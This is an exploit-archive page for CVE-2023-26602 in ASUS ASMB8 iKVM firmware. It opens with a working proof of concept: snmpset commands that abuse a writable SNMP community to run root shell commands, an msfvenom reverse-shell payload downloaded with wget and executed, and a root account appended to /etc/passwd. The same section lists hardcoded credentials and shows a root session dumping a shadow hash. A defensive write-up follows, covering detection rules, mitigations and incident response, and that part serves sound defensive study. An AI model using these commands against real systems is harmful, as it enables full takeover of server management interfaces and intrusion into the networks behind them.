ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)

Exploit Author: ub3rsick Analysis Author: www.bubbleslearn.ir Category: Local Language: Shell Published Date: 2025-04-16 
# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)
# Date: 2023-02-16
# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023], SC
# Vendor Homepage: https://servers.asus.com/search?q=ASMB8
# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others)
# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl
# CVE: CVE-2023-26602

++++++++++++++++++++
0x00 DESCRIPTION
++++++++++++++++++++
During a recent engagement, a remote server management interface has been
discovered. Furthermore, SNMPv2 was found to be enabled, offering write
access to the private community, subsequently allowing us to introduce
SNMP arbitrary extensions to achieve RCE.
We also found a hardcoded account sysadmin:superuser by cracking the
shadow file (md5crypt) found on the system and identifed an "anonymous"
user w/ the same password, however a lock seems to be in place to prevent
using these credentials via SSH (running defshell as default shell).
+++++++++++++++
0x01 IMPACT
+++++++++++++++
By exploiting SNMP arbitrary extension, we are able to run any command on
the system w/ root privileges, and we are able to introduce our own user
circumventing the defshell restriction for SSH.
+++++++++++++++++++++++++++++++
0x02 PROOF OF CONCEPT (PoC)
+++++++++++++++++++++++++++++++
At first, we have to create required extensions on the system, e.g. via
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"'
and if everything is set, we can just run that command by
snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
which will execute our defined command and show us its output.
+++++++++++++++++++++++++++++++
0x03 SSH Remote Root Access
+++++++++++++++++++++++++++++++
The identified RCE can be used to transfer a reverse tcp shell created
by msfvenom for arm little-endian, e.g.
msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin
We can now transfer the binary, adjust permissions and finally run it:
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"'
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"'
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"'
Again, we have to request execution of the lines in the MIB via:
snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
We get a reverse connection from the host, and can now act on the local system
to easily echo our own line into /etc/passwd:
echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd
By setting the standard shell to /bin/sh, we are able to get a SSH root
shell into the system, effectively circumventing the defshell restriction.
$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g
BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown
# uptime
15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25
# head -n 1 /etc/shadow
sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::
---
#EOF


ASUS ASMB8 iKVM 1.14.51 — Remote Code Execution (CVE-2023-26602)

This article explains the technical nature, impact, detection and mitigation of the CVE-2023-26602 vulnerability affecting ASUS ASMB8 iKVM (out-of-band management) firmware (reported for versions up to 1.14.51). The vulnerability stems from an exposed, writable SNMPv2 interface combined with NET-SNMP “extend” functionality and additional weak configuration defaults. The content is written for security practitioners, system administrators and incident responders with an emphasis on defensive measures and safe detection techniques.

Executive summary

  • Vulnerability: Writable SNMPv2 community combined with NET-SNMP extend support can be abused to execute system commands as root.
  • Impact: Remote code execution (RCE) on the iKVM appliance, potential local privilege escalation and the ability to persist or manipulate local accounts.
  • Affected: ASUS ASMB8 iKVM firmware versions reported up to 1.14.51 (verify vendor advisory for exact versions).
  • Severity: High / Critical for exposed management interfaces reachable from untrusted networks.
  • Mitigation: Apply vendor firmware updates, disable or restrict SNMP, enforce SNMPv3 or strong community strings, firewall management interfaces, and rotate default credentials.

Vulnerability background and root cause

The core issue arises from two conditions that can coexist on embedded management appliances:

  • A SNMP agent configured to accept SNMPv2 SET operations with a writable community string (for example, "private" or other weak values).
  • Support in the SNMP agent for the NET-SNMP-EXTEND-MIB (nsExtend), which allows creation of “extend” entries that cause the agent to execute commands on the host and return results via SNMP.

When an attacker has SNMP SET privileges they can create or modify nsExtend entries to run arbitrary shell commands. Because the SNMP agent runs with root privileges on many embedded platforms, these commands execute as root, resulting in RCE.

Why this is especially dangerous on iKVM appliances

  • Out-of-band management interfaces are often reachable from management networks or even externally if misconfigured.
  • Appliances run minimal but privileged services; compromise yields control over device telemetry and can be used to pivot into managed infrastructure.
  • Embedded devices frequently run older libraries and may contain weak defaults such as hardcoded accounts or permissive SNMP community strings.

High-level exploitation model (non-actionable)

At a conceptual level, an attacker who can perform SNMP SETs with a writable community can:

  • Create an nsExtend entry that specifies a command to run on the device.
  • Trigger the agent to execute the command and retrieve output via SNMP GET/GETNEXT/GETBULK.
  • Use the RCE to stage additional tooling, exfiltrate data, add local accounts or establish persistence.

The specifics of the exploit—exact commands, binary transfers, payloads or techniques used to gain interactive shells—are operational and should not be reproduced in uncontrolled environments. The defensive guidance below focuses on detection and mitigation.

Proof-of-concept (safe, read-only verification)

You can safely verify whether a device exposes SNMP and the NET-SNMP-EXTEND-MIB without performing write operations. The following examples show read-only enumeration.

snmpwalk -v2c -c public 192.0.2.10 SNMPv2-MIB::sysDescr.0
snmpwalk -v2c -c public 192.0.2.10 NET-SNMP-EXTEND-MIB::nsExtendObjects

Explanation: These commands use SNMPv2c and a common (read-only) community string named "public" to retrieve the device description and any existing extend objects. They are safe read-only queries that help determine whether NET-SNMP-EXTEND is present on the device. If the device responds and returns nsExtend entries, it indicates the agent supports that MIB; it does not, by itself, demonstrate a writable community or successful exploit.

Indicators of compromise (IoCs) and forensic evidence

  • Unexpected entries under NET-SNMP-EXTEND-MIB (nsExtend) or changes to SNMP configuration files.
  • New or modified files in temporary locations (e.g., /tmp, /var/tmp, /var/lib/net-snmp) containing binaries or scripts.
  • New lines in /etc/passwd or /etc/shadow indicating added local accounts.
  • Outgoing connections from the device to unfamiliar external IPs/ports (web fetches, reverse shells).
  • SNMP SET requests targeting NET-SNMP-EXTEND OIDs in management logs or network captures.

Detection rules and monitoring (examples)

Below are defensively oriented signatures and checks you can implement. Adjust IPs, community names and OIDs to match your environment.

# Suricata/IDS (conceptual) — detect SNMP SET to NET-SNMP-EXTEND OID range
alert udp any any -> any 161 (msg:"SNMPv2 SET to NET-SNMP-EXTEND OID"; content:"|a9|"; depth:1; sid:1000001; rev:1;)

Explanation: This conceptual rule highlights SNMP SET PDUs targeting OIDs. (In practice, SNMP protocol parsing should be used and OID ranges for NET-SNMP-EXTEND-MIB should be specified.) Use your IDS/packet capture tooling to tune precise rules — the above is illustrative and not directly drop-in.

# Example SIEM detection logic (pseudo-query)
- Look for logs where snmpd processed 'SET' operations to OIDs under .1.3.6.1.4.1.8072.1.3 (NET-SNMP-EXTEND)
- Correlate with new process creations or file writes in /tmp within the same time window

Explanation: Correlating SNMP SETs against system activity (new processes, files, or network connections) helps identify an exploitation attempt even if the SNMP traffic itself is encrypted or obfuscated.

Mitigations and remediation (recommended actions)

  • Apply vendor patches: The primary remediation is to install firmware updates provided by ASUS that address CVE-2023-26602. Always check vendor advisories and apply recommended updates promptly.
  • Disable SNMP if not required: If SNMP is unused, disable the service entirely on management appliances.
  • Restrict access: Limit SNMP access to trusted management networks with firewall rules, VLANs and access control lists. Block SNMP (UDP 161/162) from untrusted networks.
  • Use SNMPv3: Where SNMP is required, migrate to SNMPv3 with authentication and encryption rather than SNMPv2/v1 community strings.
  • Remove/rotate default or weak communities: Remove well-known community strings (public/private) and avoid weak or shared strings for write operations. Ensure community strings are treated as sensitive credentials.
  • Harden device accounts: Remove hardcoded or unused accounts, enforce unique strong passwords, and prefer key-based SSH authentication. Audit /etc/passwd and /etc/shadow for unexpected entries.
  • Audit SNMP configuration: Ensure the SNMP agent does not inadvertently allow creation of executable extend entries by untrusted parties.
  • Monitor and alert: Log SNMP SET operations and create alerts for SETs to extend-related OIDs or for unexpected modifications to system files.

Recommended configuration checklist

Item Recommended setting
Firmware Apply vendor patch; keep firmware up to date
SNMP version Prefer SNMPv3; if SNMPv2 required, restrict and monitor
SNMP communities No default communities; strong, unique write community or disable write
Network access Restrict SNMP to management VLAN and ACLs
Account management Remove hardcoded accounts; enforce strong passwords and remove defunct shells

For incident responders: containment and recovery steps

  • Immediately isolate the affected device from networks (especially management and production networks) to stop further lateral movement.
  • Capture volatile evidence: memory (if possible), running processes, open connections, and SNMP logs, then preserve disk images for analysis.
  • Scan for persistence: check /etc/passwd, /etc/shadow, crontabs, startup scripts and common temporary locations for attacker artifacts.
  • Rebuild from known-good firmware or factory-reset the device after ensuring you have captured forensic evidence.
  • Rotate credentials used by the device and any systems potentially affected by the compromise.

Practical hardening examples (safe)

Below are safe operations you can run from an administrative workstation for discovery and validation. They are read-only and suitable for inventory and verification.

# Read-only SNMP query to get device description (safe)
snmpget -v2c -c public 192.0.2.10 SNMPv2-MIB::sysDescr.0

Explanation: This command queries the sysDescr OID to show device and firmware information without modifying state. Use the output to identify firmware versions that may be affected.

# Enumerate existing NET-SNMP extend entries (read-only)
snmpwalk -v2c -c public 192.0.2.10 NET-SNMP-EXTEND-MIB::nsExtendObjects

Explanation: This read-only walk lists any pre-existing nsExtend entries. Presence of extend objects indicates the agent supports the extend mechanism; it does not imply writable community presence. Follow up with configuration review if extend entries appear.

Vendor coordination and disclosure

If you discover a vulnerable or compromised device in your environment, contact ASUS support / vendor security channels for guidance and to confirm available firmware updates. Follow coordinated disclosure best practices if you are a researcher reporting new findings.

References and further reading

  • CVE-2023-26602 (search vendor and CVE databases for full advisory)
  • NET-SNMP-EXTEND-MIB documentation and best practices (NET-SNMP project)
  • Vendor advisories and firmware release notes for ASUS server management appliances

Final notes

CVE-2023-26602 highlights a recurring class of issues on embedded management appliances: powerful management interfaces exposed with weak access controls. The safest course is to limit exposure of management interfaces, adopt secure transport and authentication (SNMPv3), and keep device firmware current. If you manage networked infrastructure, treat out-of-band interfaces as high-value assets and apply the same rigorous security controls as production hosts.